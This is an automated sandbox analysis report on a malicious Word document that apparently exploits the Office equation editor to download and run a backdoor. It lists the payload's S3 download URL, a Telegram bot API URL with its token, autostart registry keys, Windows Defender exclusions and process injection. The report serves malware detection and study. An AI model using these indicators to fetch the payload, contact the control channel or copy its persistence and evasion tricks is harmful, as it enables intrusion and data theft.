Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.7.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1Startup Items1Startup Items1Masquerading221OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder221Access Token Manipulation1Disable or Modify Tools11LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Process Injection111Virtualization/Sandbox Evasion121Security Account ManagerVirtualization/Sandbox Evasion121SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder221Access Token Manipulation1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection111LSA SecretsFile and Directory Discovery12SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Information Discovery14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsTimestomp1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 404236 Sample: Allignright_companyprofile.doc Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 57 api.telegram.org 2->57 67 Multi AV Scanner detection for dropped file 2->67 69 Sigma detected: Powershell adding suspicious path to exclusion list 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 14 other signatures 2->73 9 EQNEDT32.EXE 11 2->9         started        14 svchost.exe 2->14         started        16 Bw6d8Paf6bOV36xS4N6.exe 2->16         started        18 WINWORD.EXE 290 26 2->18         started        signatures3 process4 dnsIp5 59 s3-us-west-2-r-w.amazonaws.com 52.218.240.113, 49167, 80 AMAZON-02US United States 9->59 61 miolouno.s3-us-west-2.amazonaws.com 9->61 53 C:\Users\user\AppData\...\CTF loader_es.exe, PE32 9->53 dropped 55 C:\Users\user\AppData\Local\...\mad[1].exe, PE32 9->55 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->79 20 CTF loader_es.exe 5 4 9->20         started        81 Multi AV Scanner detection for dropped file 14->81 83 Machine Learning detection for dropped file 14->83 85 Adds a directory exclusion to Windows Defender 16->85 24 powershell.exe 16->24         started        26 powershell.exe 16->26         started        28 powershell.exe 16->28         started        30 powershell.exe 16->30         started        file6 signatures7 process8 file9 49 C:\Windows\Resources\Themes\...\svchost.exe, PE32 20->49 dropped 51 C:\Users\user\...\Bw6d8Paf6bOV36xS4N6.exe, PE32 20->51 dropped 75 Creates an autostart registry key pointing to binary in C:\Windows 20->75 77 Adds a directory exclusion to Windows Defender 20->77 32 Bw6d8Paf6bOV36xS4N6.exe 1 20->32         started        35 powershell.exe 7 20->35         started        37 powershell.exe 7 20->37         started        39 7 other processes 20->39 signatures10 process11 signatures12 63 Adds a directory exclusion to Windows Defender 32->63 65 Injects a PE file into a foreign processes 32->65 41 powershell.exe 32->41         started        43 powershell.exe 32->43         started        45 powershell.exe 32->45         started        47 powershell.exe 32->47         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Allignright_companyprofile.doc15%ReversingLabsDocument-RTF.Exploit.Heuristic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\CTF loader_es.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe100%Joe Sandbox ML
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe41%VirustotalBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe19%MetadefenderBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe45%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\CTF loader_es.exe41%VirustotalBrowse
C:\Users\user\AppData\Roaming\CTF loader_es.exe19%MetadefenderBrowse
C:\Users\user\AppData\Roaming\CTF loader_es.exe45%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe41%VirustotalBrowse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe19%MetadefenderBrowse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe45%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe19%MetadefenderBrowse
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe45%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s3-us-west-2-r-w.amazonaws.com
52.218.240.113
truefalse
    high
    api.telegram.org
    149.154.167.220
    truefalse
      high
      miolouno.s3-us-west-2.amazonaws.com
      unknown
      unknownfalse
        high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://miolouno.s3-us-west-2.amazonaws.com/mad.exefalse
          high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckCTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpfalse
            high
            http://www.windows.com/pctv.powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.comCTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpfalse
                high
                http://www.msnbc.com/news/ticker.txtCTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpfalse
                  high
                  http://www.icra.org/vocabulary/.CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.CTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmpfalse
                    high
                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmpfalse
                      high
                      http://investor.msn.com/CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpfalse
                        high
                        http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmpfalse
                          high
                          https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmpfalse
                            high
                            http://www.%s.comPACTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueCTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.hotmail.com/oeCTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCTF loader_es.exe, 00000004.00000003.2124857296.0000000002B2B000.00000004.00000001.sdmpfalse
                                high
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipCTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                52.218.240.113
                                s3-us-west-2-r-w.amazonaws.comUnited States
                                16509AMAZON-02USfalse

                                General Information

                                Joe Sandbox Version:32.0.0 Black Diamond
                                Analysis ID:404236
                                Start date:04.05.2021
                                Start time:20:30:17
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 15m 55s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Allignright_companyprofile.doc
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:40
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.adwa.expl.evad.winDOC@46/28@3/1
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .doc
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Found warning dialog
                                • Click Ok
                                • Attach to Office via COM
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                Show All
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • TCP Packets have been reduced to 100
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                20:30:38API Interceptor152x Sleep call for process: EQNEDT32.EXE modified
                                20:30:43API Interceptor219x Sleep call for process: CTF loader_es.exe modified
                                20:30:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                20:30:52API Interceptor243x Sleep call for process: powershell.exe modified
                                20:30:57API Interceptor178x Sleep call for process: Bw6d8Paf6bOV36xS4N6.exe modified
                                20:31:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6 C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                20:31:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6 C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                20:31:15API Interceptor8x Sleep call for process: svchost.exe modified
                                20:31:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe
                                20:31:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                s3-us-west-2-r-w.amazonaws.comPO5421-allignright.docGet hashmaliciousBrowse
                                • 52.218.170.106
                                04052021paymentscancopy.docGet hashmaliciousBrowse
                                • 52.218.224.193
                                d2c23008_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                • 52.218.180.209
                                xSfGet hashmaliciousBrowse
                                • 52.218.240.169
                                https://cornpany.s3-us-west-2.amazonaws.com/kzrtl.htmlGet hashmaliciousBrowse
                                • 52.218.252.49
                                https://share-my-resume.s3-us-west-2.amazonaws.com/2020/Emir-Markham-Resume-2020-11-16.docGet hashmaliciousBrowse
                                • 52.218.152.113
                                http://bcx-production-attachments-us-west-2.s3-us-west-2.amazonaws.comGet hashmaliciousBrowse
                                • 52.218.233.113
                                https://docs.google.com/document/d/e/2PACX-1vQxWTOwb4Q2IRxBsWs4I-tazKn6L7Tlb_umbjgm-Hc4VjUaQL96-AhMAkd3g6-XzhGxdl8RYebE29rp/pubGet hashmaliciousBrowse
                                • 52.218.237.153
                                https://docs.google.com/document/d/e/2PACX-1vS6NK2IbibcQuT3uZBBdNEmndunv9Oiw0jTUmBO6uKBjix7DH6ZwB0EWgfTu2CvIIHlPw9P7lmFSzeT/pubGet hashmaliciousBrowse
                                • 52.218.205.17
                                5476gsmtf9b8f15e4201.exeGet hashmaliciousBrowse
                                • 52.218.244.145
                                https://carletoalawyer.com/jss/Get hashmaliciousBrowse
                                • 52.218.234.105
                                http://coreit.in/?a&login=fakeuser@devnull.comGet hashmaliciousBrowse
                                • 52.218.128.29
                                PaymentPlan.docxGet hashmaliciousBrowse
                                • 52.218.249.65
                                api.telegram.orgPO5421-allignright.docGet hashmaliciousBrowse
                                • 149.154.167.220
                                Pending DHL Shipment Notification REF 04521.xlsxGet hashmaliciousBrowse
                                • 149.154.167.220
                                04052021paymentscancopy.docGet hashmaliciousBrowse
                                • 149.154.167.220
                                85a3f6aa_by_Libranalysis.rtfGet hashmaliciousBrowse
                                • 149.154.167.220
                                BID6200306761.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                OverdueInvoice-PDF.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                SLIP.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                NeworderMay20212021-pdf.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                1hbYGZf6BQ.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                from-iso_RFQ___PU.EXE1__.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                Xerox Scan_07122020181109.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                menXxRXr64.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                pN0fSLX8vx.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                Order Of Items Listed.xlsxGet hashmaliciousBrowse
                                • 149.154.167.220
                                l6qQa2fQ97.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                PO 300174.xlsxGet hashmaliciousBrowse
                                • 149.154.167.220
                                Quotation.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                WdWqhSMRsdKJxkl.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                Quotation 90809.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                nrEs3n7XCQ.exeGet hashmaliciousBrowse
                                • 149.154.167.220

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                AMAZON-02USPO5421-allignright.docGet hashmaliciousBrowse
                                • 52.218.170.106
                                pasteBorder.dllGet hashmaliciousBrowse
                                • 13.224.187.73
                                04052021paymentscancopy.docGet hashmaliciousBrowse
                                • 52.218.224.193
                                Indeed_Update_File.htmlGet hashmaliciousBrowse
                                • 143.204.98.87
                                presentation.jarGet hashmaliciousBrowse
                                • 15.237.76.117
                                presentation.jarGet hashmaliciousBrowse
                                • 143.204.98.25
                                Tmw6ajHw6W.exeGet hashmaliciousBrowse
                                • 3.14.182.203
                                New Financial Reports & Statements.htmlGet hashmaliciousBrowse
                                • 52.218.137.48
                                609110f2d14a6.dllGet hashmaliciousBrowse
                                • 54.154.149.76
                                945AEE9E799851EB1A2215FE1A60E55E41EB6D69EF4CB.exeGet hashmaliciousBrowse
                                • 3.14.18.91
                                SWIFT 00395_IMG.exeGet hashmaliciousBrowse
                                • 3.34.109.201
                                jH70i5mxJO.exeGet hashmaliciousBrowse
                                • 54.188.107.146
                                3ZtdRsbjxo.exeGet hashmaliciousBrowse
                                • 104.192.141.1
                                Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                • 18.222.240.99
                                4GGwmv0AJm.exeGet hashmaliciousBrowse
                                • 52.32.122.68
                                c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                • 54.72.3.133
                                #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                • 143.204.98.42
                                Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                • 3.134.106.170
                                0d69e4f6_by_Libranalysis.xlsGet hashmaliciousBrowse
                                • 99.83.154.118
                                d630fc19_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                • 52.219.40.51

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                C:\Users\user\AppData\Roaming\CTF loader_es.exePO5421-allignright.docGet hashmaliciousBrowse
                                  lsqtIv1jRK.exeGet hashmaliciousBrowse
                                    04052021paymentscancopy.docGet hashmaliciousBrowse
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exePO5421-allignright.docGet hashmaliciousBrowse
                                        lsqtIv1jRK.exeGet hashmaliciousBrowse
                                          04052021paymentscancopy.docGet hashmaliciousBrowse
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exePO5421-allignright.docGet hashmaliciousBrowse
                                              lsqtIv1jRK.exeGet hashmaliciousBrowse
                                                04052021paymentscancopy.docGet hashmaliciousBrowse

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:downloaded
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Virustotal, Detection: 41%, Browse
                                                  • Antivirus: Metadefender, Detection: 19%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Joe Sandbox View:
                                                  • Filename: PO5421-allignright.doc, Detection: malicious, Browse
                                                  • Filename: lsqtIv1jRK.exe, Detection: malicious, Browse
                                                  • Filename: 04052021paymentscancopy.doc, Detection: malicious, Browse
                                                  IE Cache URL:http://miolouno.s3-us-west-2.amazonaws.com/mad.exe
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................*".(.....*^..}.....(.......(.....*&.(......*".......*".(#....*Vs....($...t.........*....0................s......o.....*.0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A55F-0BCBA7498F21}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1536
                                                  Entropy (8bit):1.3539040104691664
                                                  Encrypted:false
                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbg:IiiiiiiiiifdLloZQc8++lsJe1Mzv
                                                  MD5:F6F80D0BE464ED6C743C599B4F12385A
                                                  SHA1:0CF4030CC325956908EFA90CD1373A2868568127
                                                  SHA-256:520A9042C743B61A0779F861EE3834C35F05788DE16B75553B783CF806ACF8EB
                                                  SHA-512:F53D7E037981669FB252F430393AC3AD3377F918969FF92DDBC89B6C5910C6000D3FEEF2F21D2DCBBB6D4ADB2D3B340FE3783F1A58C47CC86E8B3DB021C68878
                                                  Malicious:false
                                                  Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{784A4D1B-DE8E-4300-98F0-AE5841A8170E}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05390218305374581
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lYdn:4Wn
                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                  Malicious:false
                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BF44-6C9AC8D8FC42}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):163588
                                                  Entropy (8bit):3.745470873702184
                                                  Encrypted:false
                                                  SSDEEP:3072:+aAP+8FK1tm7YjkaipdiykZDCMbo0niY+uuDQKDCT:+FP+8miY4XLkdCP99QKGT
                                                  MD5:22FA8C878B114CA89FCABF13B0A044A3
                                                  SHA1:B449173A1CF65240EE376FC7638E3DEFD60C756A
                                                  SHA-256:D5D2CC035B4B850137BCE5E195357E5979FA3BF0FDFC57BFB925A07DF8A0DA26
                                                  SHA-512:AB02781F60B00CAC23800F49C5AF1FAD2298CFF01FE79B22C5F5F9E3FC723BEB9B96A1232A1A7001E1E81437E4A7938AA137EB6E62B5F1EBBBE8D7CB42F1CB61
                                                  Malicious:false
